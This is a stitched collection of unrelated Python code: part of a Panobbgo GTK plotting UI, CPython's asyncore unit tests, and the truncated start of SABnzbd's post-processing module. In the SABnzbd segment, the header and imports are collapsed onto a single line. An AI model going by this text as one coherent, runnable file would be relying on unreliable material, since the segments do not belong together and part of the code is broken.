# headless CI machine) we warn and substitute a mock base class so that the
# UI class below can still be *defined* without a display.
try:
    import pygtk
    pygtk.require('2.0')
except:
    print("WARNING: no module pygtk installed")

try:
    import gtk
    from gtk import gdk
    gtk_Window = gtk.Window
except:
    print("WARNING: no module gtk installed")
    # create a mock metaclass
    gtk_Window = type("Mock_gtk_Window", tuple(), {})

import matplotlib
import os
if os.environ.get("TRAVIS") == "true":
    # On Travis CI there is no display, so fall back to the Agg raster
    # backend and its canvas.
    matplotlib.use('Agg')  # 'GTKAgg' or 'GTK', or 'Agg' ?
    from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
else:
    try:
        matplotlib.use('GTKAgg')  # 'GTKAgg' or 'GTK', or 'Agg' ?
        from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
        from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar
    except Exception as ex:
        print("ERROR: not able to initialize GTKAgg: %s" % ex)
del os

# from matplotlib.widgets import Slider, Cursor  # SpanSelector
# from matplotlib.axes import Axes


class UI(Module, gtk_Window, Thread):

    r"""
    UI: a GTK top-level window that hosts matplotlib canvases in a notebook
    and runs the GTK main loop on its own thread (this class *is* the
    Thread; see :meth:`run`).
    """

    def __init__(self):
        Module.__init__(self)
        gtk.Window.__init__(self, gtk.WINDOW_TOPLEVEL)
        # fill current window: size to ~80% of the monitor the window is on,
        # with a 4:3 aspect ratio.
        screen = self.get_screen()
        monitor = screen.get_monitor_at_window(self.get_root_window())
        geom = screen.get_monitor_geometry(monitor)
        self.set_resize_mode(gtk.RESIZE_QUEUE)
        s = min([int(_ * .8) for _ in [geom.width, geom.height]])
        self.resize(int(s * 4. / 3.), s)
        # canvases registered via redraw_canvas(); polled by _auto_redraw
        self._canvases = set()
        # centered
        self.set_position(gtk.WIN_POS_CENTER)
        Thread.__init__(self)

    @staticmethod
    def mk_canvas():
        """
        Creates a FigureCanvas, ready to be added to a gtk layout element.

        Returns the ``(canvas, figure)`` pair.
        """
        from matplotlib.figure import Figure
        fig = Figure(figsize=(10, 10))
        return FigureCanvas(fig), fig

    def show(self):
        """
        Build the window (notebook, events), start the GTK main-loop thread
        and the background redraw thread.  Call once after configuration.
        """
        config = self.config
        self.logger = config.get_logger("UI")
        self.set_default_size(900, 800)
        self.connect('destroy', self.destroy)
        self.set_title(
            'Panobbgo %s@%s' % (config.version, config.git_head[:8]))
        self.set_border_width(0)
        self.top_hbox = gtk.HBox(False, 0)
        self.notebook = notebook = gtk.Notebook()
        notebook.set_tab_pos(gtk.POS_LEFT)
        self.top_hbox.add(notebook)
        notebook.show()
        self.add(self.top_hbox)
        self.add_events(gdk.BUTTON_PRESS_MASK |
                        gdk.KEY_PRESS_MASK |
                        gdk.KEY_RELEASE_MASK)
        self.show_all()
        # must be initialized before any thread touches GTK
        gdk.threads_init()
        # def run_gtk_main():
        # self.mt = Thread(target=run_gtk_main)
        # self.mt.start()
        self.start()  # launches run() -> gtk.main() on this Thread
        self._auto_redraw()

    def _auto_redraw(self):
        """
        Spawn a daemon thread that periodically redraws every registered
        canvas whose ``_need_redraw`` flag is set, holding the GTK lock
        while drawing.
        """
        def task():
            while True:
                gtk.threads_enter()
                try:
                    [c.draw_idle() for c in self._canvases if c._need_redraw]
                finally:
                    gtk.threads_leave()
                # NOTE(review): imports IPython's time wrapper each loop;
                # presumably equivalent to stdlib time.sleep — confirm.
                from IPython.utils.timing import time
                time.sleep(self.config.ui_redraw_delay)
        self.t = Thread(target=task)
        self.t.daemon = True
        self.t.start()

    def redraw_canvas(self, c):
        """
        If your canvas needs to be redrawn, pass it into this function.
        """
        assert isinstance(c, FigureCanvas)
        self._canvases.add(c)
        # picked up by the _auto_redraw polling thread
        c._need_redraw = True

    def add_notebook_page(self, label_text, frame):
        # Append ``frame`` as a new tab labelled ``label_text``.
        assert label_text is not None and frame is not None
        label = gtk.Label(label_text)
        self.notebook.append_page(frame, label)
        frame.show_all()
        self.notebook.show_all()

    def run(self):
        # Thread entry point: runs the blocking GTK main loop.
        gtk.threads_enter()
        gtk.main()
        gtk.threads_leave()

    def destroy(self, win):
        # 'destroy' signal handler: tear down the GTK main loop.
        self.logger.info("window destroyed")
        gtk.main_quit()

    def finish(self):
        """
        called by base strategy in _cleanup for shutdown
        """
        # plt.ioff()
        self.join()  # not necessary, since not a daemon
# ======================= file: test_asyncore.py =======================
# Unit tests for the (deprecated) asyncore module: helper-function behavior,
# dispatcher basics, dispatcher_with_send, file_wrapper/file_dispatcher, and
# the event-handler API exercised over IPv4/IPv6/Unix sockets with both
# select() and poll() loops.
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct

from test import support
from io import BytesIO

if support.PGO:
    raise unittest.SkipTest("test is not helpful for PGO")

try:
    import threading
except ImportError:
    threading = None

TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')


class dummysocket:
    # Minimal socket stand-in: records close(), returns a fake fileno.
    def __init__(self):
        self.closed = False

    def close(self):
        self.closed = True

    def fileno(self):
        return 42


class dummychannel:
    # Minimal channel stand-in wrapping a dummysocket, for close_all() tests.
    def __init__(self):
        self.socket = dummysocket()

    def close(self):
        self.socket.close()


class exitingdummy:
    # Handler whose every event method raises asyncore.ExitNow.
    def __init__(self):
        pass

    def handle_read_event(self):
        raise asyncore.ExitNow()

    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_expt_event = handle_read_event


class crashingdummy:
    # Handler whose every event method raises a generic Exception;
    # handle_error records that it was invoked.
    def __init__(self):
        self.error_handled = False

    def handle_read_event(self):
        raise Exception()

    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_expt_event = handle_read_event

    def handle_error(self):
        self.error_handled = True


# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
    try:
        serv.listen()
        conn, addr = serv.accept()
    except socket.timeout:
        pass
    else:
        n = 200
        start = time.time()
        # bounded both by iteration count and a 3-second wall clock
        while n > 0 and time.time() - start < 3.0:
            r, w, e = select.select([conn], [], [], 0.1)
            if r:
                n -= 1
                data = conn.recv(10)
                # keep everything except for the newline terminator
                buf.write(data.replace(b'\n', b''))
                if b'\n' in data:
                    break
            time.sleep(0.01)
        conn.close()
    finally:
        serv.close()
        evt.set()


def bind_af_aware(sock, addr):
    """Helper function to bind a socket according to its family."""
    if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
        # Make sure the path doesn't exist.
        support.unlink(addr)
        support.bind_unix_socket(sock, addr)
    else:
        sock.bind(addr)


class HelperFunctionTests(unittest.TestCase):
    def test_readwriteexc(self):
        # Check exception handling behavior of read, write and _exception

        # check that ExitNow exceptions in the object handler method
        # bubbles all the way up through asyncore read/write/_exception calls
        tr1 = exitingdummy()
        self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)

        # check that an exception other than ExitNow in the object handler
        # method causes the handle_error method to get called
        tr2 = crashingdummy()
        asyncore.read(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore.write(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore._exception(tr2)
        self.assertEqual(tr2.error_handled, True)

    # asyncore.readwrite uses constants in the select module that
    # are not present in Windows systems (see this thread:
    # http://mail.python.org/pipermail/python-list/2001-October/109973.html)
    # These constants should be present as long as poll is available
    @unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
    def test_readwrite(self):
        # Check that correct methods are called by readwrite()

        attributes = ('read', 'expt', 'write', 'closed', 'error_handled')

        expected = (
            (select.POLLIN, 'read'),
            (select.POLLPRI, 'expt'),
            (select.POLLOUT, 'write'),
            (select.POLLERR, 'closed'),
            (select.POLLHUP, 'closed'),
            (select.POLLNVAL, 'closed'),
            )

        class testobj:
            def __init__(self):
                self.read = False
                self.write = False
                self.closed = False
                self.expt = False
                self.error_handled = False

            def handle_read_event(self):
                self.read = True

            def handle_write_event(self):
                self.write = True

            def handle_close(self):
                self.closed = True

            def handle_expt_event(self):
                self.expt = True

            def handle_error(self):
                self.error_handled = True

        for flag, expectedattr in expected:
            tobj = testobj()
            self.assertEqual(getattr(tobj, expectedattr), False)
            asyncore.readwrite(tobj, flag)

            # Only the attribute modified by the routine we expect to be
            # called should be True.
            for attr in attributes:
                self.assertEqual(getattr(tobj, attr), attr==expectedattr)

            # check that ExitNow exceptions in the object handler method
            # bubbles all the way up through asyncore readwrite call
            tr1 = exitingdummy()
            self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)

            # check that an exception other than ExitNow in the object handler
            # method causes the handle_error method to get called
            tr2 = crashingdummy()
            self.assertEqual(tr2.error_handled, False)
            asyncore.readwrite(tr2, flag)
            self.assertEqual(tr2.error_handled, True)

    def test_closeall(self):
        self.closeall_check(False)

    def test_closeall_default(self):
        self.closeall_check(True)

    def closeall_check(self, usedefault):
        # Check that close_all() closes everything in a given map

        l = []
        testmap = {}
        for i in range(10):
            c = dummychannel()
            l.append(c)
            self.assertEqual(c.socket.closed, False)
            testmap[i] = c

        if usedefault:
            # temporarily swap in our map as the module-global socket_map
            socketmap = asyncore.socket_map
            try:
                asyncore.socket_map = testmap
                asyncore.close_all()
            finally:
                testmap, asyncore.socket_map = asyncore.socket_map, socketmap
        else:
            asyncore.close_all(testmap)

        self.assertEqual(len(testmap), 0)
        for c in l:
            self.assertEqual(c.socket.closed, True)

    def test_compact_traceback(self):
        try:
            raise Exception("I don't like spam!")
        except:
            real_t, real_v, real_tb = sys.exc_info()
            r = asyncore.compact_traceback()
        else:
            self.fail("Expected exception")

        (f, function, line), t, v, info = r
        self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
        self.assertEqual(function, 'test_compact_traceback')
        self.assertEqual(t, real_t)
        self.assertEqual(v, real_v)
        self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))


class DispatcherTests(unittest.TestCase):

    def setUp(self):
        pass

    def tearDown(self):
        asyncore.close_all()

    def test_basic(self):
        d = asyncore.dispatcher()
        self.assertEqual(d.readable(), True)
        self.assertEqual(d.writable(), True)

    def test_repr(self):
        d = asyncore.dispatcher()
        self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))

    def test_log(self):
        d = asyncore.dispatcher()

        # capture output of dispatcher.log() (to stderr)
        l1 = "Lovely spam! Wonderful spam!"
        l2 = "I don't like spam!"
        with support.captured_stderr() as stderr:
            d.log(l1)
            d.log(l2)

        lines = stderr.getvalue().splitlines()
        self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])

    def test_log_info(self):
        d = asyncore.dispatcher()

        # capture output of dispatcher.log_info() (to stdout via print)
        l1 = "Have you got anything without spam?"
        l2 = "Why can't she have egg bacon spam and sausage?"
        l3 = "THAT'S got spam in it!"
        with support.captured_stdout() as stdout:
            d.log_info(l1, 'EGGS')
            d.log_info(l2)
            d.log_info(l3, 'SPAM')

        lines = stdout.getvalue().splitlines()
        expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
        self.assertEqual(lines, expected)

    def test_unhandled(self):
        d = asyncore.dispatcher()
        d.ignore_log_types = ()

        # capture output of dispatcher.log_info() (to stdout via print)
        with support.captured_stdout() as stdout:
            d.handle_expt()
            d.handle_read()
            d.handle_write()
            d.handle_connect()

        lines = stdout.getvalue().splitlines()
        expected = ['warning: unhandled incoming priority event',
                    'warning: unhandled read event',
                    'warning: unhandled write event',
                    'warning: unhandled connect event']
        self.assertEqual(lines, expected)

    def test_strerror(self):
        # refers to bug #8573
        err = asyncore._strerror(errno.EPERM)
        if hasattr(os, 'strerror'):
            self.assertEqual(err, os.strerror(errno.EPERM))
        err = asyncore._strerror(-1)
        self.assertTrue(err != "")


class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
    # Write-only dispatcher used by the send test below.
    def readable(self):
        return False

    def handle_connect(self):
        pass


class DispatcherWithSendTests(unittest.TestCase):

    def setUp(self):
        pass

    def tearDown(self):
        asyncore.close_all()

    @unittest.skipUnless(threading, 'Threading required for this test.')
    @support.reap_threads
    def test_send(self):
        evt = threading.Event()
        sock = socket.socket()
        sock.settimeout(3)
        port = support.bind_port(sock)

        cap = BytesIO()
        args = (evt, cap, sock)
        t = threading.Thread(target=capture_server, args=args)
        t.start()
        try:
            # wait a little longer for the server to initialize (it sometimes
            # refuses connections on slow machines without this wait)
            time.sleep(0.2)

            data = b"Suppose there isn't a 16-ton weight?"
            d = dispatcherwithsend_noread()
            d.create_socket()
            d.connect((support.HOST, port))

            # give time for socket to connect
            time.sleep(0.1)

            d.send(data)
            d.send(data)
            d.send(b'\n')

            n = 1000
            while d.out_buffer and n > 0:
                asyncore.poll()
                n -= 1

            evt.wait()

            self.assertEqual(cap.getvalue(), data*2)
        finally:
            t.join(timeout=TIMEOUT)
            if t.is_alive():
                self.fail("join() timed out")


@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
                     'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
    def setUp(self):
        self.d = b"It's not dead, it's sleeping!"
        with open(support.TESTFN, 'wb') as file:
            file.write(self.d)

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test_recv(self):
        fd = os.open(support.TESTFN, os.O_RDONLY)
        w = asyncore.file_wrapper(fd)
        os.close(fd)

        # file_wrapper dup()s the fd, so the wrapper's fd differs from ours
        self.assertNotEqual(w.fd, fd)
        self.assertNotEqual(w.fileno(), fd)
        self.assertEqual(w.recv(13), b"It's not dead")
        self.assertEqual(w.read(6), b", it's")
        w.close()
        self.assertRaises(OSError, w.read, 1)

    def test_send(self):
        d1 = b"Come again?"
        d2 = b"I want to buy some cheese."
        fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
        w = asyncore.file_wrapper(fd)
        os.close(fd)

        w.write(d1)
        w.send(d2)
        w.close()
        with open(support.TESTFN, 'rb') as file:
            self.assertEqual(file.read(), self.d + d1 + d2)

    @unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
                         'asyncore.file_dispatcher required')
    def test_dispatcher(self):
        fd = os.open(support.TESTFN, os.O_RDONLY)
        data = []
        class FileDispatcher(asyncore.file_dispatcher):
            def handle_read(self):
                data.append(self.recv(29))
        s = FileDispatcher(fd)
        os.close(fd)
        asyncore.loop(timeout=0.01, use_poll=True, count=2)
        self.assertEqual(b"".join(data), self.d)

    def test_resource_warning(self):
        # Issue #11453
        fd = os.open(support.TESTFN, os.O_RDONLY)
        f = asyncore.file_wrapper(fd)

        os.close(fd)
        with support.check_warnings(('', ResourceWarning)):
            # dropping the last reference should emit a ResourceWarning
            f = None
            support.gc_collect()

    def test_close_twice(self):
        fd = os.open(support.TESTFN, os.O_RDONLY)
        f = asyncore.file_wrapper(fd)
        os.close(fd)

        f.close()
        self.assertEqual(f.fd, -1)
        # calling close twice should not fail
        f.close()


class BaseTestHandler(asyncore.dispatcher):
    # Dispatcher whose handlers all fail loudly unless overridden; tests
    # override exactly the events they expect, which set self.flag.

    def __init__(self, sock=None):
        asyncore.dispatcher.__init__(self, sock)
        self.flag = False

    def handle_accept(self):
        raise Exception("handle_accept not supposed to be called")

    def handle_accepted(self):
        raise Exception("handle_accepted not supposed to be called")

    def handle_connect(self):
        raise Exception("handle_connect not supposed to be called")

    def handle_expt(self):
        raise Exception("handle_expt not supposed to be called")

    def handle_close(self):
        raise Exception("handle_close not supposed to be called")

    def handle_error(self):
        raise


class BaseServer(asyncore.dispatcher):
    """A server which listens on an address and dispatches the
    connection to a handler.
    """

    def __init__(self, family, addr, handler=BaseTestHandler):
        asyncore.dispatcher.__init__(self)
        self.create_socket(family)
        self.set_reuse_addr()
        bind_af_aware(self.socket, addr)
        self.listen(5)
        self.handler = handler

    @property
    def address(self):
        return self.socket.getsockname()

    def handle_accepted(self, sock, addr):
        self.handler(sock)

    def handle_error(self):
        raise


class BaseClient(BaseTestHandler):

    def __init__(self, family, address):
        BaseTestHandler.__init__(self)
        self.create_socket(family)
        self.connect(address)

    def handle_connect(self):
        pass


class BaseTestAPI:
    # Mixin with the actual event-API tests; concrete subclasses below set
    # `family`, `addr` and `use_poll`.

    def tearDown(self):
        asyncore.close_all(ignore_all=True)

    def loop_waiting_for_flag(self, instance, timeout=5):
        # Pump the asyncore loop until instance.flag is set, or fail after
        # `timeout` seconds split over 100 iterations.
        timeout = float(timeout) / 100
        count = 100
        while asyncore.socket_map and count > 0:
            asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
            if instance.flag:
                return
            count -= 1
            time.sleep(timeout)
        self.fail("flag not set")

    def test_handle_connect(self):
        # make sure handle_connect is called on connect()

        class TestClient(BaseClient):
            def handle_connect(self):
                self.flag = True

        server = BaseServer(self.family, self.addr)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_handle_accept(self):
        # make sure handle_accept() is called when a client connects

        class TestListener(BaseTestHandler):
            def __init__(self, family, addr):
                BaseTestHandler.__init__(self)
                self.create_socket(family)
                bind_af_aware(self.socket, addr)
                self.listen(5)
                self.address = self.socket.getsockname()

            def handle_accept(self):
                self.flag = True

        server = TestListener(self.family, self.addr)
        client = BaseClient(self.family, server.address)
        self.loop_waiting_for_flag(server)

    def test_handle_accepted(self):
        # make sure handle_accepted() is called when a client connects

        class TestListener(BaseTestHandler):
            def __init__(self, family, addr):
                BaseTestHandler.__init__(self)
                self.create_socket(family)
                bind_af_aware(self.socket, addr)
                self.listen(5)
                self.address = self.socket.getsockname()

            def handle_accept(self):
                asyncore.dispatcher.handle_accept(self)

            def handle_accepted(self, sock, addr):
                sock.close()
                self.flag = True

        server = TestListener(self.family, self.addr)
        client = BaseClient(self.family, server.address)
        self.loop_waiting_for_flag(server)

    def test_handle_read(self):
        # make sure handle_read is called on data received

        class TestClient(BaseClient):
            def handle_read(self):
                self.flag = True

        class TestHandler(BaseTestHandler):
            def __init__(self, conn):
                BaseTestHandler.__init__(self, conn)
                self.send(b'x' * 1024)

        server = BaseServer(self.family, self.addr, TestHandler)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_handle_write(self):
        # make sure handle_write is called

        class TestClient(BaseClient):
            def handle_write(self):
                self.flag = True

        server = BaseServer(self.family, self.addr)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_handle_close(self):
        # make sure handle_close is called when the other end closes
        # the connection

        class TestClient(BaseClient):
            def handle_read(self):
                # in order to make handle_close be called we are supposed
                # to make at least one recv() call
                self.recv(1024)

            def handle_close(self):
                self.flag = True
                self.close()

        class TestHandler(BaseTestHandler):
            def __init__(self, conn):
                BaseTestHandler.__init__(self, conn)
                self.close()

        server = BaseServer(self.family, self.addr, TestHandler)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_handle_close_after_conn_broken(self):
        # Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
        # #11265).

        data = b'\0' * 128

        class TestClient(BaseClient):

            def handle_write(self):
                self.send(data)

            def handle_close(self):
                self.flag = True
                self.close()

            def handle_expt(self):
                self.flag = True
                self.close()

        class TestHandler(BaseTestHandler):

            def handle_read(self):
                self.recv(len(data))
                self.close()

            def writable(self):
                return False

        server = BaseServer(self.family, self.addr, TestHandler)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    @unittest.skipIf(sys.platform.startswith("sunos"),
                     "OOB support is broken on Solaris")
    def test_handle_expt(self):
        # Make sure handle_expt is called on OOB data received.
        # Note: this might fail on some platforms as OOB data is
        # tenuously supported and rarely used.
        if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
            self.skipTest("Not applicable to AF_UNIX sockets.")

        if sys.platform == "darwin" and self.use_poll:
            self.skipTest("poll may fail on macOS; see issue #28087")

        class TestClient(BaseClient):
            def handle_expt(self):
                self.socket.recv(1024, socket.MSG_OOB)
                self.flag = True

        class TestHandler(BaseTestHandler):
            def __init__(self, conn):
                BaseTestHandler.__init__(self, conn)
                self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)

        server = BaseServer(self.family, self.addr, TestHandler)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_handle_error(self):

        class TestClient(BaseClient):
            def handle_write(self):
                # deliberately raise ZeroDivisionError inside the handler
                1.0 / 0
            def handle_error(self):
                self.flag = True
                try:
                    raise
                except ZeroDivisionError:
                    pass
                else:
                    raise Exception("exception not raised")

        server = BaseServer(self.family, self.addr)
        client = TestClient(self.family, server.address)
        self.loop_waiting_for_flag(client)

    def test_connection_attributes(self):
        server = BaseServer(self.family, self.addr)
        client = BaseClient(self.family, server.address)

        # we start disconnected
        self.assertFalse(server.connected)
        self.assertTrue(server.accepting)
        # this can't be taken for granted across all platforms
        #self.assertFalse(client.connected)
        self.assertFalse(client.accepting)

        # execute some loops so that client connects to server
        asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
        self.assertFalse(server.connected)
        self.assertTrue(server.accepting)
        self.assertTrue(client.connected)
        self.assertFalse(client.accepting)

        # disconnect the client
        client.close()
        self.assertFalse(server.connected)
        self.assertTrue(server.accepting)
        self.assertFalse(client.connected)
        self.assertFalse(client.accepting)

        # stop serving
        server.close()
        self.assertFalse(server.connected)
        self.assertFalse(server.accepting)

    def test_create_socket(self):
        s = asyncore.dispatcher()
        s.create_socket(self.family)
        self.assertEqual(s.socket.family, self.family)
        SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
        sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK
        if hasattr(socket, 'SOCK_CLOEXEC'):
            self.assertIn(s.socket.type,
                          (sock_type | socket.SOCK_CLOEXEC, sock_type))
        else:
            self.assertEqual(s.socket.type, sock_type)

    def test_bind(self):
        if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
            self.skipTest("Not applicable to AF_UNIX sockets.")
        s1 = asyncore.dispatcher()
        s1.create_socket(self.family)
        s1.bind(self.addr)
        s1.listen(5)
        port = s1.socket.getsockname()[1]

        s2 = asyncore.dispatcher()
        s2.create_socket(self.family)
        # EADDRINUSE indicates the socket was correctly bound
        self.assertRaises(OSError, s2.bind, (self.addr[0], port))

    def test_set_reuse_addr(self):
        if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
            self.skipTest("Not applicable to AF_UNIX sockets.")

        with socket.socket(self.family) as sock:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            except OSError:
                unittest.skip("SO_REUSEADDR not supported on this platform")
            else:
                # if SO_REUSEADDR succeeded for sock we expect asyncore
                # to do the same
                s = asyncore.dispatcher(socket.socket(self.family))
                self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
                                                     socket.SO_REUSEADDR))
                s.socket.close()
                s.create_socket(self.family)
                s.set_reuse_addr()
                self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
                                                    socket.SO_REUSEADDR))

    @unittest.skipUnless(threading, 'Threading required for this test.')
    @support.reap_threads
    def test_quick_connect(self):
        # see: http://bugs.python.org/issue10340
        if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
            self.skipTest("test specific to AF_INET and AF_INET6")

        server = BaseServer(self.family, self.addr)
        # run the thread 500 ms: the socket should be connected in 200 ms
        t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
                                                          count=5))
        t.start()
        try:
            with socket.socket(self.family, socket.SOCK_STREAM) as s:
                s.settimeout(.2)
                s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                             struct.pack('ii', 1, 0))
                try:
                    s.connect(server.address)
                except OSError:
                    pass
        finally:
            t.join(timeout=TIMEOUT)
            if t.is_alive():
                self.fail("join() timed out")


# Concrete parameterizations: address family x (select | poll) event loop.
class TestAPI_UseIPv4Sockets(BaseTestAPI):
    family = socket.AF_INET
    addr = (support.HOST, 0)

@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
    family = socket.AF_INET6
    addr = (support.HOSTv6, 0)

@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
    if HAS_UNIX_SOCKETS:
        family = socket.AF_UNIX
    addr = support.TESTFN

    def tearDown(self):
        support.unlink(self.addr)
        BaseTestAPI.tearDown(self)

class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
    use_poll = False

@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
    use_poll = True

class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
    use_poll = False

@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
    use_poll = True

class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
    use_poll = False

@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
    use_poll = True

if __name__ == "__main__":
    unittest.main()
postproc.py
#!/usr/bin/python3 -OO # Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. """ sabnzbd.postproc - threaded post-processing of jobs """ import os import logging import sabnzbd import xml.sax.saxutils import functools import time import re import queue from sabnzbd.newsunpack import unpack_magic, par2_repair, external_processing, \ sfv_check, build_filelists, rar_sort from threading import Thread from sabnzbd.misc import on_cleanup_list from sabnzbd.filesystem import real_path, get_unique_path, move_to_path, \ make_script_path, long_path, clip_path, renamer, remove_dir, globber, \ globber_full, set_permissions, cleanup_empty_directories, fix_unix_encoding, \ sanitize_and_trim_path, sanitize_files_in_folder, remove_file, recursive_listdir, setname_from_path, \ create_all_dirs, get_unique_filename from sabnzbd.sorting import Sorter from sabnzbd.constants import REPAIR_PRIORITY, TOP_PRIORITY, POSTPROC_QUEUE_FILE_NAME, \ POSTPROC_QUEUE_VERSION, sample_match, JOB_ADMIN, Status, VERIFIED_FILE from sabnzbd.rating import Rating import sabnzbd.emailer as emailer import sabnzbd.dirscanner as dirscanner import sabnzbd.downloader import sabnzbd.config as config import sabnzbd.cfg as cfg import sabnzbd.nzbqueue import sabnzbd.database as database import sabnzbd.notifier as notifier 
import sabnzbd.utils.rarfile as rarfile
import sabnzbd.utils.rarvolinfo as rarvolinfo
import sabnzbd.utils.checkdir

# After this many consecutive fast-queue jobs, give the slow queue a turn.
MAX_FAST_JOB_COUNT = 3

# Match samples
RE_SAMPLE = re.compile(sample_match, re.I)


class PostProcessor(Thread):
    """ PostProcessor thread, designed as Singleton """
    do = None  # Link to instance of the thread

    def __init__(self):
        """ Initialize PostProcessor thread """
        Thread.__init__(self)

        # This history queue is simply used to log what active items to display in the web_ui
        self.load()
        if self.history_queue is None:
            self.history_queue = []

        # Fast-queue for jobs already finished by DirectUnpack
        self.fast_queue = queue.Queue()

        # Regular queue for jobs that might need more attention
        self.slow_queue = queue.Queue()

        # Load all old jobs
        for nzo in self.history_queue:
            self.process(nzo)

        # Counter to not only process fast-jobs
        self.__fast_job_count = 0

        # State variables
        self.__stop = False
        self.__busy = False
        self.paused = False
        PostProcessor.do = self

    def save(self):
        """ Save postproc queue """
        logging.info("Saving postproc queue")
        sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME)

    def load(self):
        """ Load postproc queue """
        self.history_queue = []
        logging.info("Loading postproc queue")
        data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME)
        if data is None:
            return
        try:
            version, history_queue = data
            if POSTPROC_QUEUE_VERSION != version:
                logging.warning(T('Old queue detected, use Status->Repair to convert the queue'))
            elif isinstance(history_queue, list):
                # drop jobs whose download folder no longer exists
                self.history_queue = [nzo for nzo in history_queue if os.path.exists(nzo.downpath)]
        except:
            logging.info('Corrupt %s file, discarding', POSTPROC_QUEUE_FILE_NAME)
            logging.info("Traceback: ", exc_info=True)

    def delete(self, nzo_id, del_files=False):
        """ Remove a job from the post processor queue """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                if nzo.status in (Status.FAILED, Status.COMPLETED):
                    # finished jobs are only flagged; actual removal happens
                    # in run() after processing
                    nzo.to_be_removed = True
                elif nzo.status in (Status.DOWNLOADING, Status.QUEUED):
                    self.remove(nzo)
                    nzo.purge_data(delete_all_data=del_files)
                    logging.info('Removed job %s from postproc queue', nzo.final_name)
                    nzo.work_name = ''  # Mark as deleted job
                break

    def process(self, nzo):
        """ Push on finished job in the queue """
        if nzo not in self.history_queue:
            self.history_queue.append(nzo)

        # Fast-track if it has DirectUnpacked jobs or if it's still going
        if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed):
            self.fast_queue.put(nzo)
        else:
            self.slow_queue.put(nzo)
        self.save()
        sabnzbd.history_updated()

    def remove(self, nzo):
        """ Remove given nzo from the queue """
        try:
            self.history_queue.remove(nzo)
        except:
